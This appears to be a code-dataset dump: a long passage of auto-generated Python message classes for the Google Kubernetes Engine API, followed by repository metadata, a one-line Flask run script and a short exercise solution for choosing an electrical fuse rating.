field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
addonsConfig = _messages.MessageField('AddonsConfig', 1)
clusterId = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetLabelsRequest(_messages.Message):
r"""SetLabelsRequest sets the Google Cloud Platform labels on a Google
Container Engine cluster, which will in turn set them for Google Compute
Engine resources used by that cluster
Messages:
ResourceLabelsValue: The labels to set for that cluster.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
labelFingerprint: The fingerprint of the previous set of labels for this
resource, used to detect conflicts. The fingerprint is initially
generated by Kubernetes Engine and changes after every request to modify
or update labels. You must always provide an up-to-date fingerprint hash
when updating or changing labels. Make a <code>get()</code> request to
the resource to get the latest fingerprint.
name: The name (project, location, cluster id) of the cluster to set
labels. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
resourceLabels: The labels to set for that cluster.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class ResourceLabelsValue(_messages.Message):
r"""The labels to set for that cluster.
Messages:
AdditionalProperty: An additional property for a ResourceLabelsValue
object.
Fields:
additionalProperties: Additional properties of type ResourceLabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResourceLabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
clusterId = _messages.StringField(1)
labelFingerprint = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
resourceLabels = _messages.MessageField('ResourceLabelsValue', 5)
zone = _messages.StringField(6)
class SetLegacyAbacRequest(_messages.Message):
r"""SetLegacyAbacRequest enables or disables the ABAC authorization
mechanism for a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to update. This field has
been deprecated and replaced by the name field.
enabled: Whether ABAC authorization will be enabled in the cluster.
name: The name (project, location, cluster id) of the cluster to set
legacy abac. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
enabled = _messages.BooleanField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetLocationsRequest(_messages.Message):
r"""SetLocationsRequest sets the locations of the cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
locations: The desired list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the cluster's nodes
should be located. Changing the locations a cluster is in will result in
nodes being either created or removed from the cluster, depending on
whether locations are being added or removed. This list must always
include the cluster's primary zone.
name: The name (project, location, cluster) of the cluster to set
locations. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
locations = _messages.StringField(2, repeated=True)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetLoggingServiceRequest(_messages.Message):
r"""SetLoggingServiceRequest sets the logging service of a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
loggingService: The logging service the cluster should use to write
metrics. Currently available options: * "logging.googleapis.com" - the
Google Cloud Logging service * "none" - no metrics will be exported from
the cluster
name: The name (project, location, cluster) of the cluster to set logging.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
loggingService = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetMaintenancePolicyRequest(_messages.Message):
r"""SetMaintenancePolicyRequest sets the maintenance policy for a cluster.
Fields:
clusterId: The name of the cluster to update.
maintenancePolicy: The maintenance policy to be set for the cluster. An
empty field clears the existing maintenance policy.
name: The name (project, location, cluster id) of the cluster to set
maintenance policy. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: The Google Developers Console [project ID or project
number](https://support.google.com/cloud/answer/6158840).
zone: The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides.
"""
clusterId = _messages.StringField(1)
maintenancePolicy = _messages.MessageField('MaintenancePolicy', 2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetMasterAuthRequest(_messages.Message):
r"""SetMasterAuthRequest updates the admin password of a cluster.
Enums:
ActionValueValuesEnum: The exact form of action to be taken on the master
auth.
Fields:
action: The exact form of action to be taken on the master auth.
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to set auth.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
update: A description of the update.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
class ActionValueValuesEnum(_messages.Enum):
r"""The exact form of action to be taken on the master auth.
Values:
UNKNOWN: Operation is unknown and will error out.
SET_PASSWORD: Set the password to a user generated value.
GENERATE_PASSWORD: Generate a new password and set it to that.
SET_USERNAME: Set the username. If an empty username is provided, basic
authentication is disabled for the cluster. If a non-empty username
is provided, basic authentication is enabled, with either a provided
password or a generated one.
"""
UNKNOWN = 0
SET_PASSWORD = 1
GENERATE_PASSWORD = 2
SET_USERNAME = 3
action = _messages.EnumField('ActionValueValuesEnum', 1)
clusterId = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
update = _messages.MessageField('MasterAuth', 5)
zone = _messages.StringField(6)
class SetMonitoringServiceRequest(_messages.Message):
r"""SetMonitoringServiceRequest sets the monitoring service of a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
monitoringService: The monitoring service the cluster should use to write
metrics. Currently available options: * "monitoring.googleapis.com" -
the Google Cloud Monitoring service * "none" - no metrics will be
exported from the cluster
name: The name (project, location, cluster) of the cluster to set
monitoring. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
monitoringService = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetNetworkPolicyRequest(_messages.Message):
r"""SetNetworkPolicyRequest enables/disables network policy for a cluster.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster id) of the cluster to set
networking policy. Specified in the format
'projects/*/locations/*/clusters/*'.
networkPolicy: Configuration options for the NetworkPolicy feature.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
networkPolicy = _messages.MessageField('NetworkPolicy', 3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetNodePoolAutoscalingRequest(_messages.Message):
r"""SetNodePoolAutoscalingRequest sets the autoscaler settings of a node
pool.
Fields:
autoscaling: Autoscaling configuration for the node pool.
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool) of the node pool to
set autoscaler settings. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to upgrade. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
autoscaling = _messages.MessageField('NodePoolAutoscaling', 1)
clusterId = _messages.StringField(2)
name = _messages.StringField(3)
nodePoolId = _messages.StringField(4)
projectId = _messages.StringField(5)
zone = _messages.StringField(6)
class SetNodePoolManagementRequest(_messages.Message):
r"""SetNodePoolManagementRequest sets the node management properties of a
node pool.
Fields:
clusterId: Deprecated. The name of the cluster to update. This field has
been deprecated and replaced by the name field.
management: NodeManagement configuration for the node pool.
name: The name (project, location, cluster, node pool id) of the node pool
to set management properties. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to update. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
management = _messages.MessageField('NodeManagement', 2)
name = _messages.StringField(3)
nodePoolId = _messages.StringField(4)
projectId = _messages.StringField(5)
zone = _messages.StringField(6)
class SetNodePoolSizeRequest(_messages.Message):
r"""SetNodePoolSizeRequest sets the size a node pool.
Fields:
clusterId: Deprecated. The name of the cluster to update. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to set size. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodeCount: The desired node count for the pool.
nodePoolId: Deprecated. The name of the node pool to update. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840).
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
nodeCount = _messages.IntegerField(3, variant=_messages.Variant.INT32)
nodePoolId = _messages.StringField(4)
projectId = _messages.StringField(5)
zone = _messages.StringField(6)
class ShieldedInstanceConfig(_messages.Message):
r"""A set of Shielded Instance options.
Fields:
enableIntegrityMonitoring: Defines whether the instance has integrity
monitoring enabled.
enableSecureBoot: Defines whether the instance has Secure Boot enabled.
"""
enableIntegrityMonitoring = _messages.BooleanField(1)
enableSecureBoot = _messages.BooleanField(2)
class ShieldedNodes(_messages.Message):
r"""Configuration of Shielded Nodes feature.
Fields:
enabled: Whether Shielded Nodes features are enabled on all nodes in this
cluster.
"""
enabled = _messages.BooleanField(1)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
class StartIPRotationRequest(_messages.Message):
r"""StartIPRotationRequest creates a new IP for the cluster and then
performs a node upgrade on each node pool to point to the new IP.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster id) of the cluster to start IP
rotation. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
rotateCredentials: Whether to rotate credentials during IP rotation.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
projectId = _messages.StringField(3)
rotateCredentials = _messages.BooleanField(4)
zone = _messages.StringField(5)
class StatusCondition(_messages.Message):
r"""StatusCondition describes why a cluster or a node pool has a certain
status (e.g., ERROR or DEGRADED).
Enums:
CodeValueValuesEnum: Machine-friendly representation of the condition
Fields:
code: Machine-friendly representation of the condition
message: Human-friendly representation of the condition
"""
class CodeValueValuesEnum(_messages.Enum):
r"""Machine-friendly representation of the condition
Values:
UNKNOWN: UNKNOWN indicates a generic condition.
GCE_STOCKOUT: GCE_STOCKOUT indicates that Google Compute Engine
resources are temporarily unavailable.
GKE_SERVICE_ACCOUNT_DELETED: GKE_SERVICE_ACCOUNT_DELETED indicates that
the user deleted their robot service account.
GCE_QUOTA_EXCEEDED: Google Compute Engine quota was exceeded.
SET_BY_OPERATOR: Cluster state was manually changed by an SRE due to a
system logic error.
CLOUD_KMS_KEY_ERROR: Unable to perform an encrypt operation against the
CloudKMS key used for etcd level encryption. More codes TBA
"""
UNKNOWN = 0
GCE_STOCKOUT = 1
GKE_SERVICE_ACCOUNT_DELETED = 2
GCE_QUOTA_EXCEEDED = 3
SET_BY_OPERATOR = 4
CLOUD_KMS_KEY_ERROR = 5
code = _messages.EnumField('CodeValueValuesEnum', 1)
message = _messages.StringField(2)
class TierConfig(_messages.Message):
r"""TierConfig is the configuration for a tier offering. For example the
GKE standard or advanced offerings which contain different levels of
functionality and possibly cost.
Enums:
ParentValueValuesEnum: The tier from which the tier being configured
inherits. The configured tier will inherit all the features from its
parent tier.
TierValueValuesEnum: The tier that is being configured with this value.
Fields:
parent: The tier from which the tier being configured inherits. The
configured tier will inherit all the features from its parent tier.
tier: The tier that is being configured with this value.
"""
class ParentValueValuesEnum(_messages.Enum):
r"""The tier from which the tier being configured inherits. The
configured tier will inherit all the features from its parent tier.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
class TierValueValuesEnum(_messages.Enum):
r"""The tier that is being configured with this value.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
parent = _messages.EnumField('ParentValueValuesEnum', 1)
tier = _messages.EnumField('TierValueValuesEnum', 2)
class TierSettings(_messages.Message):
r"""Cluster tier settings.
Enums:
TierValueValuesEnum: Cluster tier.
Fields:
tier: Cluster tier.
"""
class TierValueValuesEnum(_messages.Enum):
r"""Cluster tier.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
tier = _messages.EnumField('TierValueValuesEnum', 1)
class TimeWindow(_messages.Message):
r"""Represents an arbitrary window of time.
Fields:
endTime: The time that the window ends. The end time should take place
after the start time.
startTime: The time that the window first starts.
"""
endTime = _messages.StringField(1)
startTime = _messages.StringField(2)
class UpdateClusterRequest(_messages.Message):
r"""UpdateClusterRequest updates the settings of a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to update.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
update: A description of the update.
updatedCluster: The updated cluster object. This field must be empty if
'update' is set.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
projectId = _messages.StringField(3)
update = _messages.MessageField('ClusterUpdate', 4)
updatedCluster = _messages.MessageField('Cluster', 5)
zone = _messages.StringField(6)
class UpdateMasterRequest(_messages.Message):
r"""UpdateMasterRequest updates the master of the cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
masterVersion: The Kubernetes version to change the master to. Users may
specify either explicit versions offered by Kubernetes Engine or version
aliases, which have the following behavior: - "latest": picks the
highest valid Kubernetes version - "1.X": picks the highest valid
patch+gke.N patch in the 1.X version - "1.X.Y": picks the highest valid
gke.N patch in the 1.X.Y version - "1.X.Y-gke.N": picks an explicit
Kubernetes version - "-": picks the default Kubernetes version
name: The name (project, location, cluster) of the cluster to update.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840).
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
masterVersion = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class UpdateNodePoolRequest(_messages.Message):
r"""SetNodePoolVersionRequest updates the version of a node pool.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
image: The desired name of the image name to use for this node. This is
used to create clusters using a custom image.
imageProject: The project containing the desired image to use for this
node pool. This is used to create clusters using a custom image.
imageType: The desired image type for the node pool.
locations: The desired list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the node pool's nodes
should be located. Changing the locations for a node pool will result in
nodes being either created or removed from the node pool, depending on
whether locations are being added or removed.
name: The name (project, location, cluster, node pool) of the node pool to
update. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to upgrade. This field
has been deprecated and replaced by the name field.
nodeVersion: The Kubernetes version to change the nodes to (typically an
upgrade). Users may specify either explicit versions offered by
Kubernetes Engine or version aliases, which have the following behavior:
- "latest": picks the highest valid Kubernetes version - "1.X": picks
the highest valid patch+gke.N patch in the 1.X version - "1.X.Y": picks
the highest valid gke.N patch in the 1.X.Y version - "1.X.Y-gke.N":
picks an explicit Kubernetes version - "-": picks the Kubernetes master
version
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
updatedNodePool: The updated node pool object. This field must be empty if
any other node pool field is set (e.g. 'node_version', 'image_type',
'locations', etc.)
upgradeSettings: Upgrade settings control disruption and speed of the
upgrade.
workloadMetadataConfig: The desired workload metadata config for the node
pool.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
image = _messages.StringField(2)
imageProject = _messages.StringField(3)
imageType = _messages.StringField(4)
locations = _messages.StringField(5, repeated=True)
name = _messages.StringField(6)
nodePoolId = _messages.StringField(7)
nodeVersion = _messages.StringField(8)
projectId = _messages.StringField(9)
updatedNodePool = _messages.MessageField('NodePool', 10)
upgradeSettings = _messages.MessageField('UpgradeSettings', 11)
workloadMetadataConfig = _messages.MessageField('WorkloadMetadataConfig', 12)
zone = _messages.StringField(13)
class UpgradeSettings(_messages.Message):
r"""These upgrade settings control the level of parallelism and the level of
disruption caused by an upgrade. maxUnavailable controls the number of
nodes that can be simultaneously unavailable. maxSurge controls the number
of additional nodes that can be added to the node pool temporarily for the
time of the upgrade to increase the number of available nodes.
(maxUnavailable + maxSurge) determines the level of parallelism (how many
nodes are being upgraded at the same time). Note: upgrades inevitably
introduce some disruption since workloads need to be moved from old nodes to
new, upgraded ones. Even if maxUnavailable=0, this holds true. (Disruption
stays within the limits of PodDisruptionBudget, if it is configured.) For
example, a 5-node pool is created with maxSurge set to 2 and maxUnavailable
set to 1. During an upgrade, GKE creates 2 upgraded nodes, then brings down
up to 3 existing nodes after the upgraded nodes are ready. GKE will only
bring down 1 node at a time.
Fields:
maxSurge: The maximum number of nodes that can be created beyond the
current size of the node pool during the upgrade process.
maxUnavailable: The maximum number of nodes that can be simultaneously
unavailable during the upgrade process. A node is considered available
if its status is Ready.
"""
maxSurge = _messages.IntegerField(1, variant=_messages.Variant.INT32)
maxUnavailable = _messages.IntegerField(2, variant=_messages.Variant.INT32)
class UsableSubnetwork(_messages.Message):
r"""UsableSubnetwork resource returns the subnetwork name, its associated
network and the primary CIDR range.
Fields:
ipCidrRange: The range of internal addresses that are owned by this
subnetwork.
network: Network Name.
secondaryIpRanges: Secondary IP ranges.
statusMessage: A human readable status message representing the reasons
for cases where the caller cannot use the secondary ranges under the
subnet. For example if the secondary_ip_ranges is empty due to a
permission issue, an insufficient permission message will be given by
status_message.
subnetwork: Subnetwork Name.
"""
ipCidrRange = _messages.StringField(1)
network = _messages.StringField(2)
secondaryIpRanges = _messages.MessageField('UsableSubnetworkSecondaryRange', 3, repeated=True)
statusMessage = _messages.StringField(4)
subnetwork = _messages.StringField(5)
class UsableSubnetworkSecondaryRange(_messages.Message):
r"""Secondary IP range of a usable subnetwork.
Enums:
StatusValueValuesEnum: This field is to determine the status of the
secondary range programmably.
Fields:
ipCidrRange: The range of IP addresses belonging to this subnetwork
secondary range.
rangeName: The name associated with this subnetwork secondary range, used
when adding an alias IP range to a VM instance.
status: This field is to determine the status of the secondary range
programmably.
"""
class StatusValueValuesEnum(_messages.Enum):
r"""This field is to determine the status of the secondary range
programmably.
Values:
UNKNOWN: UNKNOWN is the zero value of the Status enum. It's not a valid
status.
UNUSED: UNUSED denotes that this range is unclaimed by any cluster.
IN_USE_SERVICE: IN_USE_SERVICE denotes that this range is claimed by a
cluster for services. It cannot be used for other clusters.
IN_USE_SHAREABLE_POD: IN_USE_SHAREABLE_POD denotes this range was
created by the network admin and is currently claimed by a cluster for
pods. It can only be used by other clusters as a pod range.
IN_USE_MANAGED_POD: IN_USE_MANAGED_POD denotes this range was created by
Google Kubernetes Engine and is claimed for pods. It cannot be used
for other clusters.
"""
UNKNOWN = 0
UNUSED = 1
IN_USE_SERVICE = 2
IN_USE_SHAREABLE_POD = 3
IN_USE_MANAGED_POD = 4
ipCidrRange = _messages.StringField(1)
rangeName = _messages.StringField(2)
status = _messages.EnumField('StatusValueValuesEnum', 3)
class VerticalPodAutoscaling(_messages.Message):
r"""VerticalPodAutoscaling contains global, per-cluster information required
by Vertical Pod Autoscaler to automatically adjust the resources of pods
controlled by it.
Fields:
enabled: Enables vertical pod autoscaling.
"""
enabled = _messages.BooleanField(1)
class WorkloadIdentityConfig(_messages.Message):
r"""Configuration for the use of k8s Service Accounts in GCP IAM policies.
Fields:
identityNamespace: IAM Identity Namespace to attach all k8s Service
Accounts to.
workloadPool: The workload pool to attach all Kubernetes service accounts
to.
"""
identityNamespace = _messages.StringField(1)
workloadPool = _messages.StringField(2)
class WorkloadMetadataConfig(_messages.Message):
r"""WorkloadMetadataConfig defines the metadata configuration to expose to
workloads on the node pool.
Enums:
ModeValueValuesEnum: Mode is the configuration for how to expose metadata
to workloads running on the node pool.
NodeMetadataValueValuesEnum: NodeMetadata is the configuration for how to
expose metadata to the workloads running on the node.
Fields:
mode: Mode is the configuration for how to expose metadata to workloads
running on the node pool.
nodeMetadata: NodeMetadata is the configuration for how to expose metadata
to the workloads running on the node.
"""
class ModeValueValuesEnum(_messages.Enum):
r"""Mode is the configuration for how to expose metadata to workloads
running on the node pool.
Values:
MODE_UNSPECIFIED: Not set.
GCE_METADATA: Expose all GCE metadata to pods.
GKE_METADATA: Run the GKE Metadata Server on this node. The GKE Metadata
Server exposes a metadata API to workloads that is compatible with the
V1 Compute Metadata APIs exposed by the Compute Engine and App Engine
Metadata Servers. This feature can only be enabled if Workload
Identity is enabled at the cluster level.
"""
MODE_UNSPECIFIED = 0
GCE_METADATA = 1
GKE_METADATA = 2
class NodeMetadataValueValuesEnum(_messages.Enum):
r"""NodeMetadata is the configuration for how to expose metadata to the
workloads running on the node.
Values:
UNSPECIFIED: Not set.
SECURE: Prevent workloads not in hostNetwork from accessing certain VM
metadata, specifically kube-env, which contains Kubelet credentials,
and the instance identity token. Metadata concealment is a temporary
security solution available while the bootstrapping process for
cluster nodes is being redesigned with significant security
improvements. This feature is scheduled to be deprecated in the
future and later removed.
EXPOSE: Expose all VM metadata to pods.
GKE_METADATA_SERVER: Run the GKE Metadata Server on this node. The GKE
Metadata Server exposes a metadata API to workloads that is compatible
with the V1 Compute Metadata APIs exposed by the Compute Engine and
App Engine Metadata Servers. This feature can only be enabled if
Workload Identity is enabled at the cluster level.
"""
UNSPECIFIED = 0
SECURE = 1
EXPOSE = 2
GKE_METADATA_SERVER = 3
mode = _messages.EnumField('ModeValueValuesEnum', 1)
nodeMetadata = _messages.EnumField('NodeMetadataValueValuesEnum', 2)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
|
[
"[email protected]"
] | |
d8595f38931efaebad9121c07fafd55b564816a1
|
8be96a7791e50165b8849e69b1cf6a04869f2400
|
/run.py
|
58b06c7a845124aa433ff1a33ae2569c92e3b3e8
|
[] |
no_license
|
nosoccus/department-app
|
458b38387571d7dead37ff87b8dfda91cd0717fb
|
f822d1e05db5d869ab583a3a93e9e58d9100022a
|
refs/heads/main
| 2023-01-29T18:42:37.975524 | 2020-12-14T23:26:56 | 2020-12-14T23:26:56 | 317,921,415 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 76 |
py
|
import app
if __name__ == "__main__":
app.create_app().run(debug=True)
|
[
"[email protected]"
] | |
c93c5ccd6c588a6c7f2b024b62acc6badd12163b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/HDGiiCmSgJeeu3388_19.py
|
09b87a15f58f460743f3b6ef6eaacc88c698ba44
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 904 |
py
|
"""
A fuse melts when a current in an electrical device exceeds the fuse's rating,
breaking the circuit and preventing the heat from building up too much (which
can cause a fire). The ideal fuse to choose is **higher** than the device's
current output, yet **as close as possible** to it as well.
Given a list of _fuse ratings_ , and the _device's current output_ , return
which of the fuses is the best for the device.
### Examples
choose_fuse(["3V", "5V", "12V"], "4.5V") ➞ "5V"
choose_fuse(["5V", "14V", "2V"], "5.5V") ➞ "14V"
choose_fuse(["17V", "15V", "12V"], "9V") ➞ "12V"
### Notes
* You will be given three possible ratings in voltage.
* Fuses may not be in a sorted order.
* Assume that there is a valid fuse in every test case
"""
def choose_fuse(f, c):
f = [int(e[:-1]) for e in f if float(e[:-1]) >= float(c[:-1])]
return str(min(f))+'V'
|
[
"[email protected]"
] | |
75398d6fb05ae07bc21020d5bd77276beee18c18
|
66a82eb045bd14d45163a76c61ad2bfe2f9d03ab
|
/EjBasicosPython/Ej9_Diccionario.py
|
5146a9bd79f6a9db005a42464bdefde5a83d80a1
|
[
"MIT"
] |
permissive
|
alexiscv/DAM2_SGE
|
c53da5fdeb0a7bcc69bf3f1f2aa929e03a62a04c
|
aa7371262e869becca51e5352a0e46c16a997f58
|
refs/heads/master
